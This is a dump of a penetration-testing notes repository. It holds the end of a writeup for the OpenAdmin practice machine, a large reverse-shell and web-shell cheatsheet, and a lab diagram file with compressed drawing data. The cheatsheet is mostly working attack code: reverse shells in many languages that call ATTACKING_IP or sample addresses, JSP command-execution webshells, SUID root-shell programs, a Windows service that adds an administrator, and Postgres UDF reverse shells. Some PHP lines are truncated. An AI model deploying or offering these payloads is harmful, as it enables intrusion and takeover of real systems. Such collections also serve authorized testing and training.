150 | **We have a password!** Let's try using it to log in as **jimmy**... it works!
151 |
152 |
153 | ## Lateral movement to Joanna
154 |
155 | Now that we have a shell as jimmy, our goal is to become **joanna**, as this user will take us to the root.
156 |
157 | Since we have new privileges compared to before, we will be able to enumerate the machine in more depth, as for the `/var/www/internal/folder`, which seems to suggest the _presence of a web page that can only be visited from inside_ the machine, so before we could not find it via **dirbuster**.
158 |
159 | 
160 |
161 | The confirmation is obtained from the _Apache configuration file_, which tells us that on **port 52846** there is a virtual host running as **joanna**, exposing the pages contained in `/var/www/internal/`.
162 |
163 | 
164 |
165 | At this point, there are different ways to go over the obstacle:
166 |
167 | 1. SSH Port Forwarding
168 | 2. local **curl**
169 | 3. Write a PHP shell in the `/var/www/internal/` directory
170 |
171 |
172 |
173 | > In this writeup we will deal with the port forwarding approach.
174 |
175 | I used the OpenAdmin box as an **SSH tunnel** on the Kali **local port 12345**, and through **SwitchyOmega** I used port 12345 as a **proxy** so that when I visited http://127.0.0.1/52864 I was actually visiting locally the OpenAdmin machine.
176 |
177 | 
178 |
179 | In this way we can interact with the web application as if it was an exposed application.
180 |
181 | Having access to the `/var/www/internal/folder`, it was possible to **review the sources contents** in search of any vulnerabilities or bypass techniques.
182 | The `index.php` page, for example, to log in a user, checks the supplied input with a hard-coded hash:
183 |
184 | ```php
185 |
197 | ```
198 |
199 | It is therefore easy to bypass the control, either by deciding to **crack the hash** (which turns out to be a SHA512 containing the password _Revealed_), or, since we have access to the source in read/write, replacing the control with a control at will.
200 |
201 | Once the control is bypassed, we will find ourselves on the `main.php` page with **Joanna**'s private RSA certificate shown on the video.
202 |
203 | 
204 |
205 | Let's copy it into the **joanna.txt** file and give it to **ss2john** in order to generate a hash that can be cracked with **john**:
206 |
207 | 
208 |
209 | We have Joanna's password!
210 |
211 |
212 | ## Privilege Escalation
213 |
214 | The Privilege Escalation process is the easiest and fastest I've ever seen.
215 | By running the `sudo -l` command we notice how the user **joanna** can open the `/opt/priv` file via the **nano** text editor as root user.
216 |
217 | 
218 |
219 | We just have to run the command and, within nano, use the **code execution feature** to be able to run commands as root!
220 |
221 | 
222 |
223 |
224 | ## Trophy
225 | > It's never too late to start.
226 | > \- Me, Myself and I
227 |
228 | ## License
229 | Author: 0x*bro*
230 | [](http://creativecommons.org/licenses/by-nc/4.0/)
231 | This work is licensed under a [Creative Commons Attribution-NonCommercial 4.0 International License](http://creativecommons.org/licenses/by-nc/4.0/).
--------------------------------------------------------------------------------
/Cheatsheets/Shell cheatsheet.md:
--------------------------------------------------------------------------------
1 | Reverse shell, bind shell and web shell for all the things!
2 | # Bash
3 |
4 | ```bash
5 | exec /bin/bash 0&0 2>&0
6 | ```
7 |
8 | ```bash
9 | 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
10 | ```
11 |
12 | ```bash
13 | exec 5<>/dev/tcp/ATTACKING-IP/80
14 | cat <&5 | while read line; do $line 2>&5 >&5; done
15 |
16 | # or:
17 |
18 | while read line 0<&5; do $line 2>&5 >&5; done
19 | ```
20 |
21 | ```bash
22 | bash -i >& /dev/tcp/ATTACKING_IP/80 0>&1
23 | /bin/bash -c 'bash -i >& /dev/tcp/ATTACKING_IP/443 0>&1'
24 | ```
25 |
26 | # Python
27 |
28 | ```python
29 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
30 | ```
31 |
32 | # Socat
33 |
34 | ```bash
35 | socat tcp:ip:port exec:'bash -i' ,pty,stderr,setsid,sigint,sane &
36 | ```
37 |
38 | # Golang
39 |
40 | ```go
41 | echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
42 | ```
43 |
44 | - https://github.com/SaDs3c/goshell
45 |
46 | # PHP
47 |
48 | ```php
49 | php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
50 | (Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
51 | ```
52 |
53 | ```php
54 | & /dev/tcp/"ATTACKING IP"/443 0>&1'");?>
55 | & /dev/tcp/AttackerIP/port 0>&1');?>
56 | ```
57 |
58 | ```php
59 | &3 2>&3");'?>
60 | &3 2>&3");'?>
61 | &3 2>&3`;'?>
62 | &3 2>&3");'?>
63 | &3 2>&3", "r");'?>
64 | ```
65 |
66 | Base64 encrypted
67 |
68 | ```php
69 | &1 | tee /tmp/lol
89 | ```
90 |
91 | # Powershell
92 |
93 | - [powercat](../Tools/powercat.md#shell)
94 | - [Powershell for pentesters](Dev,%20ICT%20&%20Cybersec/Dev,%20scripting%20&%20OS/Powershell%20for%20pentesters.md#Shell)
95 | - [Empire](../Tools/Empire.md)
96 | - [powersploit](../Tools/powersploit.md)
97 | - [nishang](https://github.com/samratashok/nishang)
98 |
99 | # Node.js
100 |
101 | ```jsx
102 | require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');
103 | ```
104 |
105 | ```js
106 | (function(){
107 | var net = require("net"),
108 | cp = require("child_process"),
109 | sh = cp.spawn("/bin/sh", []);
110 | var client = new net.Socket();
111 | client.connect(8080, "192.168.1.1", function(){
112 | client.pipe(sh.stdin);
113 | sh.stdout.pipe(client);
114 | sh.stderr.pipe(client);
115 | });
116 | return /a/; // Prevents the Node.js application form crashing
117 | })();
118 | ```
119 | # Telnet
120 |
121 | ```bash
122 | rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING_IP 80 0/tmp/p
123 | ```
124 |
125 | ```bash
126 | telnet ATTACKING_IP 80 | /bin/bash | telnet ATTACKING_IP 443
127 | ```
128 |
129 | # Perl
130 |
131 | ```perl
132 | perl -e 'use Socket;$i="ATTACKING_IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
133 | ```
134 |
135 | Windows:
136 |
137 | ```perl
138 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING_IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
139 | ```
140 |
141 | ```perl
142 | perl -e 'use Socket;$i="ATTACKING_IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
143 | ```
144 |
145 | # Ruby
146 |
147 | ```ruby
148 | ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
149 | ```
150 |
151 | # Java
152 |
153 | ```java
154 | r = Runtime.getRuntime()
155 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
156 | p.waitFor()
157 | ```
158 |
159 | # JSP
160 |
161 | ```java
162 | <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
163 | ```
164 |
165 | ```java
166 |
170 | <%@ page import="java.io.*" %>
171 | <%
172 | String cmd = request.getParameter("cmd");
173 | String output = "";
174 | if(cmd != null) {
175 | String s = null;
176 | try {
177 | Process p = Runtime.getRuntime().exec(cmd,null,null);
178 | BufferedReader sI = new BufferedReader(new
179 | InputStreamReader(p.getInputStream()));
180 | while((s = sI.readLine()) != null) { output += s+""; }
181 | } catch(IOException e) { e.printStackTrace(); }
182 | }
183 | %>
184 | <%=output %>
185 | ```
186 | ## Tomcat (.war)
187 |
188 | ```bash
189 | mkdir webshell
190 | cp index.jsp webshell
191 |
192 | cd webshell
193 | jar -cvf ../webshell.war *
194 | added manifest
195 | adding: index.jsp(in = 579) (out= 351)(deflated 39%)
196 | ```
197 |
198 | ## Axis (.aar)
199 |
200 | Minimal [[AXIS2]] webshell
201 |
202 | ```cardlink
203 | url: https://github.com/Lexus89/AxisInvoker
204 | title: "GitHub - Lexus89/AxisInvoker: Minimal AXIS2 webshell"
205 | description: "Minimal AXIS2 webshell. Contribute to Lexus89/AxisInvoker development by creating an account on GitHub."
206 | host: github.com
207 | favicon: https://github.githubassets.com/favicons/favicon.svg
208 | image: https://opengraph.githubassets.com/78e32670a32a1b76f36b1078425c0e9845fb3adb077a83480e6918387d5fb368/Lexus89/AxisInvoker
209 | ```
210 |
211 | # C
212 |
213 | Reverse shell:
214 |
215 | ```c
216 | #include
217 | #include
218 | #include
219 | #include
220 | #include
221 | #define REMOTE_ADDR "10.13.14.15"
222 | #define REMOTE_PORT 443
223 | int main(int argc, char *argv[])
224 | {
225 | struct sockaddr_in sa;
226 | int s;
227 |
228 | sa.sin_family = AF_INET;
229 | sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
230 | sa.sin_port = htons(REMOTE_PORT);
231 |
232 | s = socket(AF_INET, SOCK_STREAM, 0);
233 | connect(s, (struct sockaddr *)&sa, sizeof(sa));
234 | dup2(s, 0);
235 | dup2(s, 1);
236 | dup2(s, 2);
237 |
238 | execve("/bin/sh", 0, 0);
239 | return 0;
240 | }
241 |
242 | ```
243 |
244 | Spawn shell (only for suid root binaries because `system` drops effective uid and effective gid):
245 |
246 | ```c
247 | // gcc -o /tmp/rootshell /tmp/rootshell.c
248 | // chmod u+s /tmp/rootshell
249 | #include
250 | #include
251 | #include
252 | int main(void)
253 | {
254 | setuid(0); setgid(0); system("/bin/bash");
255 | }
256 | ```
257 |
258 | Spawn shell (for every suid user binary):
259 |
260 | ```c
261 | #include
262 | #include
263 |
264 | int main(int argc, const char * argv[]){
265 | if (argc > 1) printf("%s", execvp(argv[1], &argv[1]));
266 | return 0;
267 | }
268 | ```
269 |
270 | ```c
271 | // gcc -o /tmp/rootshell /tmp/rootshell.c
272 | // chmod u+s /tmp/rootshell
273 | #include
274 | #include
275 | #include
276 | int main(void)
277 | {
278 | execlp("/bin/id", "id", NULL);
279 | }
280 | ```
281 |
282 | Windows command execution binary:
283 | ```c
284 | #include
285 | #include
286 |
287 | #define SLEEP_TIME 5000
288 |
289 | SERVICE_STATUS ServiceStatus;
290 | SERVICE_STATUS_HANDLE hStatus;
291 |
292 | void ServiceMain(int argc, char** argv);
293 | void ControlHandler(DWORD request);
294 |
295 | //add the payload here
296 | int Run()
297 | {
298 | system("cmd /k net localgroup administrators user /add");
299 | return 0;
300 | }
301 |
302 | int main()
303 | {
304 | SERVICE_TABLE_ENTRY ServiceTable[2];
305 | ServiceTable[0].lpServiceName = "MyService";
306 | ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
307 |
308 | ServiceTable[1].lpServiceName = NULL;
309 | ServiceTable[1].lpServiceProc = NULL;
310 |
311 | StartServiceCtrlDispatcher(ServiceTable);
312 | return 0;
313 | }
314 |
315 | void ServiceMain(int argc, char** argv)
316 | {
317 | ServiceStatus.dwServiceType = SERVICE_WIN32;
318 | ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
319 | ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
320 | ServiceStatus.dwWin32ExitCode = 0;
321 | ServiceStatus.dwServiceSpecificExitCode = 0;
322 | ServiceStatus.dwCheckPoint = 0;
323 | ServiceStatus.dwWaitHint = 0;
324 |
325 | hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);
326 | Run();
327 |
328 | ServiceStatus.dwCurrentState = SERVICE_RUNNING;
329 | SetServiceStatus (hStatus, &ServiceStatus);
330 |
331 | while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
332 | {
333 | Sleep(SLEEP_TIME);
334 | }
335 | return;
336 | }
337 |
338 | void ControlHandler(DWORD request)
339 | {
340 | switch(request)
341 | {
342 | case SERVICE_CONTROL_STOP:
343 | ServiceStatus.dwWin32ExitCode = 0;
344 | ServiceStatus.dwCurrentState = SERVICE_STOPPED;
345 | SetServiceStatus (hStatus, &ServiceStatus);
346 | return;
347 |
348 | case SERVICE_CONTROL_SHUTDOWN:
349 | ServiceStatus.dwWin32ExitCode = 0;
350 | ServiceStatus.dwCurrentState = SERVICE_STOPPED;
351 | SetServiceStatus (hStatus, &ServiceStatus);
352 | return;
353 |
354 | default:
355 | break;
356 | }
357 | SetServiceStatus (hStatus, &ServiceStatus);
358 | return;
359 | }
360 | ```
361 |
362 | # Groovy (Jenkins)
363 |
364 | Valid for [Jenkins](../Dev,%20scripting%20&%20OS/Jenkins.md)
365 |
366 | Reverse Shell:
367 |
368 | ```java
369 | String host="localhost";
370 | int port=8044;
371 | String cmd="cmd.exe";
372 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
373 | ```
374 |
375 | RCE:
376 |
377 | ```python
378 | def sout = new StringBuilder(), serr = new StringBuilder()
379 | def proc = 'ls'.execute()
380 | proc.consumeProcessOutput(sout, serr)
381 | proc.waitForOrKill(1000)
382 | println "out> $sout err> $serr"
383 | ```
384 |
385 | # UDF Postgres
386 |
387 | RCE:
388 |
389 | ```c
390 | #include "postgres.h"
391 | #include
392 | #include "fmgr.h"
393 | #include "utils/geo_decls.h"
394 | #include
395 | #include "utils/builtins.h"
396 | #ifdef PG_MODULE_MAGIC
397 | PG_MODULE_MAGIC;
398 | #endif
399 | /* Add a prototype marked PGDLLEXPORT */
400 | PGDLLEXPORT Datum awae(PG_FUNCTION_ARGS);
401 | PG_FUNCTION_INFO_V1(awae);
402 | /* this function launches the executable passed in as the first parameter
403 | in a FOR loop bound by the second parameter that is also passed*/
404 | Datum
405 | awae(PG_FUNCTION_ARGS)
406 | {
407 | /* convert text pointer to C string */
408 | #define GET_STR(textp) DatumGetCString(DirectFunctionCall1(textout,
409 | PointerGetDatum(textp)))
410 | /* retrieve the second argument that is passed to the function (an integer)
411 | that will serve as our counter limit*/
412 | int instances = PG_GETARG_INT32(1);
413 | for (int c = 0; c < instances; c++) {
414 | /*launch the process passed in the first parameter*/
415 | ShellExecute(NULL, "open", GET_STR(PG_GETARG_TEXT_P(0)), NULL, NULL, 1);
416 | }
417 | PG_RETURN_VOID();
418 | }
419 | ```
420 |
421 | Reverse shell:
422 |
423 | ```c
424 | #define _WINSOCK_DEPRECATED_NO_WARNINGS
425 | #include "postgres.h"
426 | #include
427 | #include "fmgr.h"
428 | #include "utils/geo_decls.h"
429 | #include
430 | #include
431 | #include "utils/builtins.h"
432 | #pragma comment(lib, "ws2_32")
433 | #ifdef PG_MODULE_MAGIC
434 | PG_MODULE_MAGIC;
435 | #endif
436 | /* Add a prototype marked PGDLLEXPORT */
437 | PGDLLEXPORT Datum connect_back(PG_FUNCTION_ARGS);
438 | PG_FUNCTION_INFO_V1(connect_back);
439 | WSADATA wsaData;
440 | SOCKET s1;
441 | struct sockaddr_in hax;
442 | char ip_addr[16];
443 | STARTUPINFO sui;
444 | PROCESS_INFORMATION pi;
445 | Datum
446 | connect_back(PG_FUNCTION_ARGS)
447 | {
448 | /* convert C string to text pointer */
449 | #define GET_TEXT(cstrp) \
450 | DatumGetTextP(DirectFunctionCall1(textin, CStringGetDatum(cstrp)))
451 | /* convert text pointer to C string */
452 | #define GET_STR(textp) \
453 | DatumGetCString(DirectFunctionCall1(textout, PointerGetDatum(textp)))
454 | WSAStartup(MAKEWORD(2, 2), &wsaData);
455 | s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL,
456 | (unsigned int)NULL);
457 | hax.sin_family = AF_INET;
458 | /* FIX THIS */
459 | hax.sin_port = XXXXXXXXXXXXX
460 | /* FIX THIS TOO*/
461 | hax.sin_addr.s_addr = XXXXXXXXXXXXXXX
462 | WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
463 | memset(&sui, 0, sizeof(sui));
464 | sui.cb = sizeof(sui);
465 | sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
466 | sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)s1;
467 | CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
468 | PG_RETURN_VOID();
469 | }
470 | ```
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/LAB 1.md:
--------------------------------------------------------------------------------
1 | ---
2 |
3 | excalidraw-plugin: parsed
4 | tags: [excalidraw]
5 |
6 | ---
7 | ==⚠ Switch to EXCALIDRAW VIEW in the MORE OPTIONS menu of this document. ⚠== You can decompress Drawing data with the command palette: 'Decompress current Excalidraw file'. For more info check in plugin settings under 'Saving'
8 |
9 |
10 | # Excalidraw Data
11 |
12 | ## Text Elements
13 | Attacker ^Slz6zZG1
14 |
15 | [[Network 1/Legacy]] ^t9ANyQqJ
16 |
17 | [[Network 1/Writeup]] ^VqOEzuic
18 |
19 | Network 1 ^M3ytJYbA
20 |
21 | [[Network 1/Buff]] ^fmnXaqqz
22 |
23 | [[Network 2/Postman]] ^JC3vAtVW
24 |
25 | [[Network 2/OpenAdmin]] ^oGUJzd8S
26 |
27 | Network 2 ^bRiZ8Wd4
28 |
29 | [[Network 3/Tabby]] ^GfW1J0Tu
30 |
31 | [[Tracerback]] ^NlUCDAXL
32 |
33 | [[Network 2/OpenAdmin]] ^SaemksfH
34 |
35 | Network 3 ^WuVz0Uhu
36 |
37 | double interface ^1XhVqu0t
38 |
39 | Cron Job ^T2gURC3s
40 |
41 | double interface ^45suyew5
42 |
43 | DMZ machine ^23njxREW
44 |
45 | Shared credentials ^fFmUChd3
46 |
47 | ssh -D foo@bar ... ^szDtPy1J
48 |
49 | ## Element Links
50 | LVkaL0Hd: [[Network 1/Buff]]
51 |
52 | %%
53 | ## Drawing
54 | ```compressed-json
55 | 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
98 |
